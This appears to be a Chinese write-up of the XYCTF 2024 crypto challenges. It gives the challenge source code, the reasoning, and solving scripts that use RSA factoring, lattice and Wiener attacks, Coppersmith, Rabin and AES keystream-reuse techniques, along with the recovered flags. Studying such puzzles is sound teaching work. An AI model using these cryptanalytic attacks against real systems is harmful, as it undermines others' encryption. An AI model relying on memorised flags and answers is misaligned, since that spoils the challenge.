XYCTF2024WP

题目顺序按照解题顺序排列，只打了前面两周，后面没看了

Crypto

Sign1n & Sign1n_reverg

from Crypto.Util.number import *
from tqdm import *
import gmpy2
flag=b'XYCTF{uuid}'
flag=bytes_to_long(flag)
leak=bin(int(flag))
while 1:
    leak += "0"
    if len(leak) == 514:
        break
#swap_bits函数将input_str的二进制位前后颠倒
def swap_bits(input_str):
    input_list = list(input_str[2:])
    length = len(input_list)

    for i in range(length // 2):
        temp = input_list[i]
        input_list[i] = input_list[length - 1 - i]
        input_list[length - 1 - i] = temp

    return ''.join(input_list)

input_str = leak
result = swap_bits(input_str)
a=result
#custom_add将input_str的二进制数的每一位（0或1）加上i+1后对10取余
def custom_add(input_str):
    input_list = list(input_str)
    length = len(input_list)
    for i in range(length):
        input_list[i] = str((int(input_list[i]) + i + 1) % 10)

    result = ''.join(input_list)
    return result


input_str = a
result = custom_add(input_str)
b=result
print(b)
#12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567891134567799112455779902334667900133556899112356678902344568890233457790013355689912335667990134456799023355788001244568991123467799012455778902335578800134456899123356678001344567991223557880012455689901235667801134457889023355788001345578890233566789013445778912235567900124557889013356678001344578801233467789112355779912234577990233556780113
PYTHON3

故只需将原代码中custom_add的加操作改为减再颠倒就是flag的二进制。

exp

b = '12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567891134567799112455779902334667900133556899112356678902344568890233457790013355689912335667990134456799023355788001244568991123467799012455778902335578800134456899123356678001344567991223557880012455689901235667801134457889023355788001345578890233566789013445778912235567900124557889013356678001344578801233467789112355779912234577990233556780113'

def custom_sub(input_str):
    input_list = list(input_str)
    length = len(input_list)

    for i in range(length):
        input_list[i] = str((int(input_list[i]) - i - 1) % 10)

    result = ''.join(input_list)
    return result
print(long_to_bytes(int(custom_sub(b)[::-1].strip('0'), 2)))#Sign1n需要去掉一个一个末尾的0
#b'XYCTF{24611067-c60f-427c-aaab-d17e4b81e2ee}'
1C

happy_to_solve

题目

from Crypto.Util.number import *
import sympy
from secrets import flag


def get_happy_prime():
    p = getPrime(512)
    q = sympy.nextprime(p ^ ((1 << 512) - 1))
    return p, q
m = bytes_to_long(flag)
p, q = get_happy_prime()
n = p * q
e = 65537
print(n)
print(pow(m, e, n))
# 24852206647750545040640868093921252282805229864862413863025873203291042799096787789288461426555716785288286492530194901130042940279109598071958012303179823645151637759103558737126271435636657767272703908384802528366090871653024192321398785017073393201385586868836278447340624427705360349350604325533927890879
# 14767985399473111932544176852718061186100743117407141435994374261886396781040934632110608219482140465671269958180849886097491653105939368395716596413352563005027867546585191103214650790884720729601171517615620202183534021987618146862260558624458833387692782722514796407503120297235224234298891794056695442287

PYTHON

$$p+q=2^{512}+r$$ $$(p+q)^2=(p-q)^2+4*p*q=(p-q)^2+4*n$$ $$p-q=\sqrt{(p+q)^2-4*n}$$

爆破r，得到 ,再尝试对 开方，进而分解

exp：

n = 24852206647750545040640868093921252282805229864862413863025873203291042799096787789288461426555716785288286492530194901130042940279109598071958012303179823645151637759103558737126271435636657767272703908384802528366090871653024192321398785017073393201385586868836278447340624427705360349350604325533927890879
c = 14767985399473111932544176852718061186100743117407141435994374261886396781040934632110608219482140465671269958180849886097491653105939368395716596413352563005027867546585191103214650790884720729601171517615620202183534021987618146862260558624458833387692782722514796407503120297235224234298891794056695442287

r = 1
while 1:
    x = 2**512  + r
    tmp = x ** 2 - 4*n
    y = gmpy2.iroot(tmp,2)
    if y[1]:
        p = (x+y[0]) // 2
        q = n // p
        d = gmpy2.invert(65537,(p-1)*(q-1))
        m = pow(c,d,n)
        print(long_to_bytes(m))
        print(r)             
        break
    else:
        r += 1
#b'XYCTF{24611067-c60f-427c-aaab-d17e4b81e2ee}'
APACHE

factor1

import gmpy2
import hashlib
from Crypto.Util.number import *

p = getPrime(512)
q = getPrime(512)
d = getPrime(512)
e = gmpy2.invert(d, (p**3 - 1) * (q**3 - 1))
flag = "XYCTF{" + hashlib.md5(str(p + q).encode()).hexdigest() + "}"
print(e)
print(p * q)
# 172005065945326769176157335849432320425605083524943730546805772515111751580759726759492349719668775270727323745284785341119685198468883978645793770975366048506237371435027612758232099414404389043740306443065413069994232238075194102578269859784981454218948784071599231415554297361219709787507633404217550013282713899284609273532223781487419770338416653260109238572639243087280632577902857385265070736208291583497988891353312351322545840742380550393294960815728021248513046077985900158814037534487146730483099151396746751774427787635287611736111679074330407715700153025952858666841328055071403960165321273972935204988906850585454805923440635864200149694398767776539993952528995717480620593326867245714074205285828967234591508039849777840636255379730281105670496110061909219669860172557450779495125345533232776767292561378244884362014224844319802810586344516400297830227894063759083198761120293919537342405893653545157892446163
# 99075185389443078008327214328328747792385153883836599753096971412377366865826254033534293886034828804219037466246175526347014045811852531994537520303063113985486063022444972761276531422538694915030159420989401280012025249129111871649831185047820236417385693285461420040134313833571949090757635806658958193793

APACHE

e过大，想到低解密指数攻击，同时得到两个函数，

$$e * d = 1 \enspace mod \enspace (p^{3}-1)*(q^{3}-1)$$ $$n = p * q$$

令n= 在格上构造

$$[D, n+1$$ $$0, -e]$$

其中D =

exp

#sagemath
e=172005065945326769176157335849432320425605083524943730546805772515111751580759726759492349719668775270727323745284785341119685198468883978645793770975366048506237371435027612758232099414404389043740306443065413069994232238075194102578269859784981454218948784071599231415554297361219709787507633404217550013282713899284609273532223781487419770338416653260109238572639243087280632577902857385265070736208291583497988891353312351322545840742380550393294960815728021248513046077985900158814037534487146730483099151396746751774427787635287611736111679074330407715700153025952858666841328055071403960165321273972935204988906850585454805923440635864200149694398767776539993952528995717480620593326867245714074205285828967234591508039849777840636255379730281105670496110061909219669860172557450779495125345533232776767292561378244884362014224844319802810586344516400297830227894063759083198761120293919537342405893653545157892446163
n=99075185389443078008327214328328747792385153883836599753096971412377366865826254033534293886034828804219037466246175526347014045811852531994537520303063113985486063022444972761276531422538694915030159420989401280012025249129111871649831185047820236417385693285461420040134313833571949090757635806658958193793
n=n^3
from Crypto.Util.number import *
import random
from gmpy2 import *
D = 2^(n.nbits()//2)
m = matrix(ZZ, [
  [D, n+1],
  [0, -e]
])
L = m.LLL()
w = L[0]
v = m.solve_left(w)
k = abs(v[0])
d = abs(v[1])
print(k)
print(d)
k=1494016303704162064457264904035459059241052443477469129020991127731711502975536480528822831565100775167693515363479900721259984367515846296462994230670260
d=8447122254265361577759220083550460887840558233627984117576685838469227480934556534673167325385487344741530262745308367064419215281251764917289925433582347

MAKEFILE

根据k,d即可求出p,q

# coding=utf-8
import random
import libnum

e=172005065945326769176157335849432320425605083524943730546805772515111751580759726759492349719668775270727323745284785341119685198468883978645793770975366048506237371435027612758232099414404389043740306443065413069994232238075194102578269859784981454218948784071599231415554297361219709787507633404217550013282713899284609273532223781487419770338416653260109238572639243087280632577902857385265070736208291583497988891353312351322545840742380550393294960815728021248513046077985900158814037534487146730483099151396746751774427787635287611736111679074330407715700153025952858666841328055071403960165321273972935204988906850585454805923440635864200149694398767776539993952528995717480620593326867245714074205285828967234591508039849777840636255379730281105670496110061909219669860172557450779495125345533232776767292561378244884362014224844319802810586344516400297830227894063759083198761120293919537342405893653545157892446163
n=99075185389443078008327214328328747792385153883836599753096971412377366865826254033534293886034828804219037466246175526347014045811852531994537520303063113985486063022444972761276531422538694915030159420989401280012025249129111871649831185047820236417385693285461420040134313833571949090757635806658958193793
k=1494016303704162064457264904035459059241052443477469129020991127731711502975536480528822831565100775167693515363479900721259984367515846296462994230670260
d=8447122254265361577759220083550460887840558233627984117576685838469227480934556534673167325385487344741530262745308367064419215281251764917289925433582347

k = e * d - 1

r = k
t = 0
while True:
    r = r // 2
    t += 1
    if r % 2 == 1:
        break

success = False

for i in range(1, 101):
    g = random.randint(0, n)
    y = pow(g, r, n)
    if y == 1 or y == n - 1:
        continue

    for j in range(1, t):
        x = pow(y, 2, n)
        if x == 1:
            success = True
            break
        elif x == n - 1:
            continue
        else:
            y = x

    if success:
        break
    else:
        continue

if success:
    p = libnum.gcd(y - 1, n)
    q = n // p
    print('p = ' + '%s' % p)
    print('q = ' + '%s' % q)
    flag = "XYCTF{" + hashlib.md5(str(p + q).encode()).hexdigest() + "}"
    print(flag)
    print(n==p*q)
else:
    print('Cannot compute P and Q')
'''   
p = 9212046353930376594996890089494718736894378991991381248242532319628627449681664076081705664941905594411935750003102856235503684466394327681725704255564467
q = 10754959493573546439510276829300246769373124436128170955050379041986504869221750743052397622171703140881050431144683659643071578143360949942206693325622779
XYCTF{a83211a70e18145a59671c08ddc67ba4}
True
'''
PYTHON

这里用wiener也可以，只不过需要在多组k,d解出的p,q验证。应为d为512位，n^3有512 2 3位，delta=0.1666···，满足条件

babyRSAMAX

题目：

from Crypto.Util.number import *
from gmpy2 import *
from random import choice

flag = b'XYCTF{******}'
e = '?'
def getBabyPrime(nbits):
    while True:
        p = 1
        while p.bit_length() <= nbits:
            p *= choice(sieve_base)
        
        if isPrime(p+1):
            return p+1

p = getBabyPrime(512)
q = getBabyPrime(512)
n = p*q
gift1 = (pow(p,e,n)-pow(q,e,n)) % n
gift2 = pow(p+q,e,n)

t = 65537
x = bytes_to_long(e)
y = pow(x, t, n)

m = bytes_to_long(flag)
c = powmod(m, e, n)

print(f'n = {n}')
print(f'gift1 = {gift1}')
print(f'gift2 = {gift2}')
print(f'c = {c}')
print(f'y = {y}')

'''
n = 39332423872740210783246069030855946244104982381157166843977599780233911183158560901377359925435092326653303964261550158658551518626014048783435245471536959844874036516931542444719549997971482644905523459407775392702211086149279473784796202020281909706723380472571862792003687423791576530085747716706475220532321
gift1 = 4549402444746338327349007235818187793950285105091726167573552412678416759694660166956782755631447271662108564084382098562999950228708300902201571583419116299932264478381197034402338481872937576172197202519770782458343606060544694608852844228400457232100904217062914047342663534138668490328400022651816597367310
gift2 = 111061215998959709920736448050860427855012026815376672067601244053580566359594802604251992986382187891022583247997994146019970445247509119719411310760491983876636264003942870756402328634092146799825005835867245563420135253048223898334460067523975023732153230791136870324302259127159852763634051238811969161011462
c = 16938927825234407267026017561045490265698491840814929432152839745035946118743714566623315033802681009017695526374397370343984360997903165842591414203197184946588470355728984912522040744691974819630118163976259246941579063687857994193309554129816268931672391946592680578681270693589911021465752454315629283033043
y = 1813650001270967709841306491297716908969425248888510985109381881270362755031385564927869313112540534780853966341044526856705589020295048473305762088786992446350060024881117741041260391405962817182674421715239197211274668450947666394594121764333794138308442124114744892164155894256326961605137479286082964520217

'''
1C

存在关系：

$$gift1 = p^e -q^e \enspace mod\enspace n$$ $$gift2 = (p+q)^e =p^e+q^e \enspace mod \enspace n$$ $$y=e^{65537} \enspace mod \enspace n$$ $$c=m^e \enspace mod \enspace n$$

分解p，q

$$gift1+gift2=2*p^e \enspace mod \enspace n$$ $$gift2-gift1=2*q^e \enspace mod \enspace n$$ $$p=gcd(gift1+gift2,n)$$ $$q=gcd(gift2-gift1,n)$$

方法2：可能是非预期，因为p,q的生成是

$$p_1*p_2**p_n+1$$

可以用p-1光滑攻击

n = 39332423872740210783246069030855946244104982381157166843977599780233911183158560901377359925435092326653303964261550158658551518626014048783435245471536959844874036516931542444719549997971482644905523459407775392702211086149279473784796202020281909706723380472571862792003687423791576530085747716706475220532321

# decode: 利用 p-1 光滑攻击分解出 p,q
from gmpy2 import *
a = 2
N = n
n = 2
while True:
    a = powmod(a, n, N)
    res = gcd(a-1, N)
    if res != 1 and res != N:
        q = N // res
        print(res*q==N)
        print('p=',res)
        print('q=',q)
        break
    n += 1
'''
True
p= 236438400477521597922950445153796265199072404577183190953114805170522875904551780358338769440558816351105253794964040981919231484098097671084895302287425479
q= 166353789373057352195268575168397750362643822201253508941052835945420624983216456266478176579651490080696973849607356408696043718492499993062863415424578199
'''
1C

得到p,q后，就可以求出e

y = 1813650001270967709841306491297716908969425248888510985109381881270362755031385564927869313112540534780853966341044526856705589020295048473305762088786992446350060024881117741041260391405962817182674421715239197211274668450947666394594121764333794138308442124114744892164155894256326961605137479286082964520217
p= 236438400477521597922950445153796265199072404577183190953114805170522875904551780358338769440558816351105253794964040981919231484098097671084895302287425479
q= 166353789373057352195268575168397750362643822201253508941052835945420624983216456266478176579651490080696973849607356408696043718492499993062863415424578199
print(n==p*q)
d=inverse(65537,(p-1)*(q-1))
print(long_to_bytes(pow(y,d,n)))
#b'XYCTF{e==4096}'
ROUTEROS

很明显e=,采用多轮rabin攻击

exp

from Crypto.Util.number import *
e=4096
c = 16938927825234407267026017561045490265698491840814929432152839745035946118743714566623315033802681009017695526374397370343984360997903165842591414203197184946588470355728984912522040744691974819630118163976259246941579063687857994193309554129816268931672391946592680578681270693589911021465752454315629283033043
p= 236438400477521597922950445153796265199072404577183190953114805170522875904551780358338769440558816351105253794964040981919231484098097671084895302287425479
q= 166353789373057352195268575168397750362643822201253508941052835945420624983216456266478176579651490080696973849607356408696043718492499993062863415424578199

def repeat_rabin(x,e,p,q):
    n = p * q
    x0=gmpy2.invert(p,q)
    x1=gmpy2.invert(q,p)
    cs = [c]
    for i in range(x):
        ps = []
        for c2 in cs:
            r = pow(c2, (p + 1) // 4, p)
            s = pow(c2, (q + 1) // 4, q)
            x = (r * x1 * q + s * x0 * p) % n
            y = (r * x1 * q - s * x0 * p) % n
            if x not in ps:
                ps.append(x)
            if n - x not in ps:
                ps.append(n - x)
            if y not in ps:
                ps.append(y)
            if n - y not in ps:
                ps.append(n - y)
        cs = ps
    return cs
ps=repeat_rabin(12,e,p,q)
for m in ps:
    print(long_to_bytes(m))

VIM

xor

题目：

from Crypto.Cipher import AES
from Crypto.Util.Padding import pad
import os

flag = open("flag.txt", "rb").read()
key = os.urandom(16)
iv = os.urandom(16)
flag = pad(flag, 16)

def aes_encrypt(key, plaintext):
    cipher = AES.new(key, AES.MODE_ECB)
    return cipher.encrypt(plaintext)


def encrypt(key, plaintext, iv):
    ciphertext = b""
    for i in range(0, len(plaintext), AES.block_size):
        key_block = aes_encrypt(key, iv)
        ciphertext_block = bytes(
            [plaintext[i + j] ^ key_block[j] for j in range(AES.block_size)]
        )
        ciphertext += ciphertext_block
        iv = key_block
    return ciphertext


while 1:
    try:
        print("1.print\n2.input\n3.exit")
        a = input("> ")
        if a == "1":
            print((iv + encrypt(key, flag, iv)).hex())
        elif a == "2":
            ivs = bytes.fromhex(input("iv: "))
            inputs = bytes.fromhex(input("message: "))
            print(encrypt(key, inputs, ivs).hex())
        elif a == "3":
            exit(0)
        else:
            print("You need input 1,2,3")
    except:exit(0)
PYTHON

分析代码可知，加密过程是异或操作，每一轮的密钥由上一轮的iv经过AES的ECB模式加密得到，加密的key未知。

题目两个功能，1选项，给出初始iv和加密后的flag密文，暂时不知道如何解密，缺少key或者每轮的key_block,2选项，输入iv和一个明文，得到其加密后的密文。

关键点在这里，已知明文密文，加密过程是异或，能否求出key_block。但key_block是AES加密的，由key和iv得到，key全程未知，初始iv已知，故不可能我们正向得到key_block，那么能否逆向得到加密后的key_block呢？

这里选择2允许我们自定义加密明文和密文，我们可以令ivs为初始iv，那么两次加密过程的每轮key_block一样，故先输入1，获取初始iv和flag_c，再输入2，令两次初始iv相同，根据得到的明文密文求出每轮key_block，再求解。

exp

flag_c='600106b927db260469a566518b6e64aa69018fcbed26078a3f7df0108be6f753d67bda6bf16dbf1de6ebe8c1aa134abe3ef6c0b1ccc140f5ff08a86a1a04afc5'

flag_c=bytes.fromhex(flag_c)
flag_iv,flag_c=flag_c[:16],flag_c[16:]

iv=flag_iv.hex()
iv=bytes.fromhex(iv)
m=iv*3
c='5159ca268c8611b960bea22262bfbe9c834db9ffe2d5ae2ca22fbca240501c766ac7a26edd785497a59eb331956ecf6b'
c=bytes.fromhex(c)


iv_c=bytes(c[i]^m[i] for i in range(16*3))
c=b''
key_block = iv_c*3
for i in range(0,48,16):
    ciphertext_block = bytes(
        [flag_c[i+j] ^ key_block[i+j] for j in range(16)]
    )
    c += ciphertext_block
print(c)
#b'XYCTF{076f4cb7-e57e-4c75-a22a-2b40df6b2f33}\n\x04\x04\x04\x04'
ROUTEROS

反方向的密码 相思

from Crypto.Util.number import *
import hashlib
from secrets import flag


def hash(x):
    return hashlib.sha256(x.encode()).digest()


def pad(message):
    return message + hash(str(len(message)))


m = bytes_to_long(pad(flag))
p = getStrongPrime(512)
q = getStrongPrime(512)
n = p * q
e = 3
print(pow(m, e, n))
print(n)
# 120440199294949712392334113337541924034371176306546446428347114627162894108760435789068328282135879182130546564535108930827440004987170619301799710272329673259390065147556073101312748104743572369383346039000998822862286001416166288971531241789864076857299162050026949096919395896174243383291126202796610039053
# 143413213355903851638663645270518081058249439863120739973910994223793329606595495141951165221740599158773181585002460087410975579141155680671886930801733174300593785562287068287654547100320094291092508723488470015821072834947151827362715749438612812148855627557719115676595686347541785037035334177162406305243

PYTHON

代码很简单就是个RSA加密，但生成的素数是强素数，无法分解，注意到e=3,想到低加密指数攻击，但开方出来不对，可能是>n,尝试爆破k，还是没能求解。仔细观察，发现明文经过hash填充，仔细想想，一个flag内容算10个字符内容吗，加上XYCTF{},有17 * 8 =136位，加上填充256位，再3次方有1176位，k就有100多位大小，不太可能爆破出来。又尝试能否有限域开方，失败。

仔细观察代码。这里不是对flag内容的hash填充，而是对长度，因此一个flag长度再怎么也在100以内，故填充内容可以爆破得知。现在已知明文低位，以及明文部分高位，尝试coppersmith求中间位。这里，需要调整一下small_roots的参数。

exp

c=120440199294949712392334113337541924034371176306546446428347114627162894108760435789068328282135879182130546564535108930827440004987170619301799710272329673259390065147556073101312748104743572369383346039000998822862286001416166288971531241789864076857299162050026949096919395896174243383291126202796610039053
n=143413213355903851638663645270518081058249439863120739973910994223793329606595495141951165221740599158773181585002460087410975579141155680671886930801733174300593785562287068287654547100320094291092508723488470015821072834947151827362715749438612812148855627557719115676595686347541785037035334177162406305243
e = 3
from Crypto.Util.number import *
import hashlib
from gmpy2 import *
m0=bytes_to_long(b'XYCTF{')
m3=bytes_to_long(b'}')
def hash(x):
    a=hashlib.sha256(x.encode()).digest()
    return a
num=256
for i in range(8,47):
    R.<x> = PolynomialRing(Zmod(n))
    m2=bytes_to_long(hash(str(i)))
    N=((m0*2^(8*(i-6))+x*2^8+m3)*2^num+m2)^e-c
    N=N.monic()
    m=N.small_roots(x=2^(8*(i-7)), beta=1, epsilon=0.05)
    print(i,(8*(i-7)),m)
    for x in m:
        print(long_to_bytes(x*2^8+m3))
        print(long_to_bytes((m0*2^(8*(i-6))+x*2^8+m3)*2^num+m2))
'''
38 248 [58964190787951927773278389967057377362495121527440001979648729026891046689]
b'!__d3ng__hu0__1@n__3h@n__Chu__!}'
b'XYCTF{!__d3ng__hu0__1@n__3h@n__Chu__!}\xae\xa9!2\xc4\xcb\xeb&>j\xc2\xbfl\x18;]\x81s\x7f\x17\x9f!\xef\xdcXcs\x96r\xf0\xf4p'
'''
MOONSCRIPT

Complex_dlp

题目：

from Crypto.Util.number import *
from secrets import flag


class Complex:
    def __init__(self, re, im):
        self.re = re
        self.im = im

    def __mul__(self, c):
        re_ = self.re * c.re - self.im * c.im
        im_ = self.re * c.im + self.im * c.re
        return Complex(re_, im_)

    def __str__(self):
        if self.im == 0:
            return str(self.re)
        elif self.re == 0:
            if abs(self.im) == 1:
                return f"{'-' if self.im < 0 else ''}i"
            else:
                return f"{self.im}i"
        else:
            return f"{self.re} {'+' if self.im > 0 else '-'} {abs(self.im)}i"


def complex_pow(c, exp, n):
    result = Complex(1, 0)
    while exp > 0:
        if exp & 1:
            result = result * c
            result.re = result.re % n
            result.im = result.im % n
        c = c * c
        c.re = c.re % n
        c.im = c.im % n
        exp >>= 1
    return result


flag = flag.strip(b"XYCTF{").strip(b"}")
p = 1127236854942215744482170859284245684922507818478439319428888584898927520579579027
g = Complex(3, 7)
x = bytes_to_long(flag)
print(complex_pow(g, x, p))
# 5699996596230726507553778181714315375600519769517892864468100565238657988087817 + 198037503897625840198829901785272602849546728822078622977599179234202360717671908i

PYTHON3

定义了一个复数类，flag为指数。考点在复数域下求离散对数，先将复数转换成实数，再求离散对数。

exp

g=3^2+7^2
a,b=5699996596230726507553778181714315375600519769517892864468100565238657988087817 , 198037503897625840198829901785272602849546728822078622977599179234202360717671908
c=a^2+b^2
p=1127236854942215744482170859284245684922507818478439319428888584898927520579579027
from Crypto.Util.number import *
G=Zmod(p) 
g=G(g) 
c=G(c) 
print(long_to_bytes(ZZ(discrete_log(c,g))))
#___c0mp13x_d1p_15_3@5y_f0r_y0u___
SAGEMATH

happy_to_solve2

源码：

import random
from Crypto.Util.number import *
from secrets import flag


def get_happy_prime():
    while 1:
        p = int("".join([random.choice("123") for _ in range(512)]))
        q = int("".join([random.choice("567") for _ in range(512)]))
        if isPrime(p) and isPrime(q):
            return (p,q)

m = bytes_to_long(flag)
p ,q= get_happy_prime()
n = p * q
e = 65537
print(n)
print(pow(m, e, n))
# 697906506747097082736076931509594586899561519277373830451275402914416296858960649459482027106166486723487162428522597262774248272216088755005277069446993003521270487750989061229071167729138628583207229945902389632065500739730301375338674342457656803764567184544685006193130563116558641331897204457729877920989968662546183628637193220770495938729301979912328865798266631957128761871326655572836258178871966196973138373358029531478246243442559418904559585334351259080578222274926069834941166567112522869638854253933559832822899069320370733424453856240903784235604251466010104012061821038897933884352804297256364409157501116832788696434711523621632436970698827611375698724661553712549209133526623456888111161142213830821361143023186927163314212097199831985368310770663850851571934739809387798422381702174820982531508641022827776262236373967579266271031713520262606203067411268482553539580686495739014567368858613520107678565628269250835478345171330669316220473129104495659093134763261751546990704365966783697780787341963138501
# 153383826085102296581238539677668696644156148059026868813759015106139131297135097831661048493079405226972222492151356105759235749502324303047037349410709021152255315429280760639113724345836532087970918453353723090554450581657930847674930226113840172368662838756446364482977092478979838209396761279326533419699056209983721842484996150025403009644653678928025861445324715419893797015875541525590135843027312322236085581571452084477262582966972702577136904385741443870527205640874446616413917231260133364227248928492574610248881137364204914001412269740461851747883355414968499272944590071623223603501698004227753335552646715567802825755799597955409228004284739743749531270833084850113574712041224896044525292591264637452797151098802604186311724597450780520140413704697374209653369969451501627583467893160412780732575085846467289134920886789952338174193202234175299652687560232593212131693456966318670843605238958724126368185289703563591477049105538528244632434869965333722691837462591128379816582723367039674028619947057144546

CSS

p,q的十进制位由特定数字123和456组成，对于任意a,b,c,d，组成的10进制数ab,cd存在

$$n=p*q=(10*a+b)(10*c+d)=a*c*100^2+(b*c+a*d)*10+b*d$$ $$n-b*d=a*c*100^2+(b*c+a*d)*10$$

故n-b*d结果的b,d所在十进制位为0，p,q的一个十进制位有3种可能，一组p,q相同位有9种，爆破找到其中满足条件的

exp

n=697906506747097082736076931509594586899561519277373830451275402914416296858960649459482027106166486723487162428522597262774248272216088755005277069446993003521270487750989061229071167729138628583207229945902389632065500739730301375338674342457656803764567184544685006193130563116558641331897204457729877920989968662546183628637193220770495938729301979912328865798266631957128761871326655572836258178871966196973138373358029531478246243442559418904559585334351259080578222274926069834941166567112522869638854253933559832822899069320370733424453856240903784235604251466010104012061821038897933884352804297256364409157501116832788696434711523621632436970698827611375698724661553712549209133526623456888111161142213830821361143023186927163314212097199831985368310770663850851571934739809387798422381702174820982531508641022827776262236373967579266271031713520262606203067411268482553539580686495739014567368858613520107678565628269250835478345171330669316220473129104495659093134763261751546990704365966783697780787341963138501
e=65537
c=153383826085102296581238539677668696644156148059026868813759015106139131297135097831661048493079405226972222492151356105759235749502324303047037349410709021152255315429280760639113724345836532087970918453353723090554450581657930847674930226113840172368662838756446364482977092478979838209396761279326533419699056209983721842484996150025403009644653678928025861445324715419893797015875541525590135843027312322236085581571452084477262582966972702577136904385741443870527205640874446616413917231260133364227248928492574610248881137364204914001412269740461851747883355414968499272944590071623223603501698004227753335552646715567802825755799597955409228004284739743749531270833084850113574712041224896044525292591264637452797151098802604186311724597450780520140413704697374209653369969451501627583467893160412780732575085846467289134920886789952338174193202234175299652687560232593212131693456966318670843605238958724126368185289703563591477049105538528244632434869965333722691837462591128379816582723367039674028619947057144546
from Crypto.Util.number import *
from gmpy2 import *

p=''
q=''
def get_pq(p1,q1,i):
    a=[]
    for pi in '123':
        for qi in '567':
            p = pi + p1
            q = qi + q1
            p,q=map(int,[p,q])

            if (n - p * q) % pow(10, i+1) == 0:
                a.append([p,q])
    return a
PQ=[[p,q]]
for i in range(512):
    tmp_PQ=[]
    for j in PQ:
        p,q=j
        tmp_PQ+=get_pq(str(p),str(q),i)
    PQ=tmp_PQ
for p,q in PQ:
    if isPrime(p):
        print(f'{p=}')
        print(f'{q=}')
        print(n % p, n % q, n == p * q)
        d = invert(e, (p - 1) * (q - 1))
        m = powmod(c, d, n)
        print(long_to_bytes(m))
#b'XYCTF{7f4b2241951976ce5ef6df44503209059997e5085d1bc21f6bef4d9effb29fd0}'
ROUTEROS

factor3

题目：

from Crypto.Util.number import *
import random

flag = b'XYCTF{*****}'
m = bytes_to_long(flag)
def gainPrime():
    while True:
        x = random.getrandbits(256)
        y = random.getrandbits(256)

        if y % 2 == 0:
            continue

        p = x ** 3 + 3 * y ** 3
        if p.bit_length() == 768 and p % 2 == 1 and isPrime(p):
            return p

p, q = gainPrime(), gainPrime()
N = p * q
phi = (p ** 2 + p + 1) * (q ** 2 + q + 1)
d = getPrime(320)
e = inverse(d, phi)
c = d**2^m

print(f"N: {N}")
print(f"e: {e}")
print(f"c: {c}")

N: 913125842482770239379848062277162627509794409924607555622246822717218133091223291889541294440266178282194506242444509803611492259403578922020590849630191477864719052980160940803309686069818208833547621252544423652489179493083138385424424384165228024273745733240109761707533778691158938848158094054261174692601673435971526522219273943464877956131040249169850420336023942653021547841666224446678539579529590840999008107782784268926145671962239929431694391039559247
e: 494518390582436635999115147756676313570637682518235195828939117782099618734167908630788943568232122157772909140885391963441876427590731524706959546524212914108888799081844320513851526790475333924396837458796755678072486028072639014677580265244176441153444956871730684233063789931539669072735599696830757690822185323538738397827461580678488181113667710378657058297572328491762536595872579603698945272140918157163640403488075948987156585480146162739943419183496337465468187233821931312507662218106713861638334075899266373256620752680354704533272722692596941861606161634082613228896420520465402725359166156632884432690715903666803067996854084671477445131853993177110154928274312496230096270510089973592664248613332000290545537840595645944390047611474888693558676781309912289044962293014118087259307560444929227407113819165713213046898243995956550944640168932947118400215917515277554126694376415569909534496134700668701465649939
c: 4450931337369461482106945992542133557585962894030505065110870389112565329875502952762182372926117037373210509516570958483606566274369840551132381128665744266165792377925899683228751870742727716
APACHE

对e和wiener攻击

exp

n= 913125842482770239379848062277162627509794409924607555622246822717218133091223291889541294440266178282194506242444509803611492259403578922020590849630191477864719052980160940803309686069818208833547621252544423652489179493083138385424424384165228024273745733240109761707533778691158938848158094054261174692601673435971526522219273943464877956131040249169850420336023942653021547841666224446678539579529590840999008107782784268926145671962239929431694391039559247
e= 494518390582436635999115147756676313570637682518235195828939117782099618734167908630788943568232122157772909140885391963441876427590731524706959546524212914108888799081844320513851526790475333924396837458796755678072486028072639014677580265244176441153444956871730684233063789931539669072735599696830757690822185323538738397827461580678488181113667710378657058297572328491762536595872579603698945272140918157163640403488075948987156585480146162739943419183496337465468187233821931312507662218106713861638334075899266373256620752680354704533272722692596941861606161634082613228896420520465402725359166156632884432690715903666803067996854084671477445131853993177110154928274312496230096270510089973592664248613332000290545537840595645944390047611474888693558676781309912289044962293014118087259307560444929227407113819165713213046898243995956550944640168932947118400215917515277554126694376415569909534496134700668701465649939
c= 4450931337369461482106945992542133557585962894030505065110870389112565329875502952762182372926117037373210509516570958483606566274369840551132381128665744266165792377925899683228751870742727716
n=n**2

from Crypto.Util.number import *
from gmpy2 import *
class ContinuedFraction():
    def __init__(self,numerator,denumerator):
        self.numberlist = [] # number in continued fraction
        self.fractionlist = [] # the near fraction list
        self.GenerateNumberList (numerator, denumerator)
        self.GenerateFractionList ()
    def GenerateNumberList (self, numerator, denumerator):
        while numerator != 1:
            quotient = numerator // denumerator
            remainder = numerator % denumerator
            self.numberlist.append (quotient)
            numerator = denumerator
            denumerator = remainder
    def GenerateFractionList (self) :
        self.fractionlist.append ([self.numberlist[0], 1])
        for i in range (1, len (self.numberlist)):
            numerator = self.numberlist[i]
            denumerator = 1
            for j in range (i) :
                temp = numerator
                numerator = denumerator + numerator * self.numberlist[i-j-1]
                denumerator = temp
            self.fractionlist.append([numerator, denumerator])
a = ContinuedFraction(e,n)
for k,d in a.fractionlist:
    s = long_to_bytes(pow(c, d, n))
    try:
        print(long_to_bytes(d ** 2 ^ c).decode())
    except Exception:
        pass
#XYCTF{I_love_to_read_the_crypto_paper_and_try_to_ak_them}
PYTHON

反方向的密码 情难

代码

import hashlib
from Crypto.Util.number import *
from secrets import flag


def hash(x):
    return hashlib.sha512(x.encode()).digest() * 2


def pad(message):
    return (message[: len(message) // 2] + hash(str(len(message))) + message[len(message) // 2 :])


p = getStrongPrime(1024)
q = getStrongPrime(1024)
n = p * q
e = 2
m = bytes_to_long(pad(flag))
print(pow(m, e, n))
print(n)
# 3335299537518434350008670067273514020883265809787658909900831303201069228111667477512288715627313377374377192065531931991830331266940281529429758933125645068623703704431432931062515459304407129764836169638068667723468109909932687335727824459807903558617156661138991973933280805156893120951135488168923425258119689993859896540097318197048436676318334502053269738046279338047497258783747007084564814994803144049365117574904704816542523015746396519693505167963245600047742456478545640334467678554748227823020862550712083249012329745708139070338928730226897923885785783461594034339595106377701306570280371612953393097739
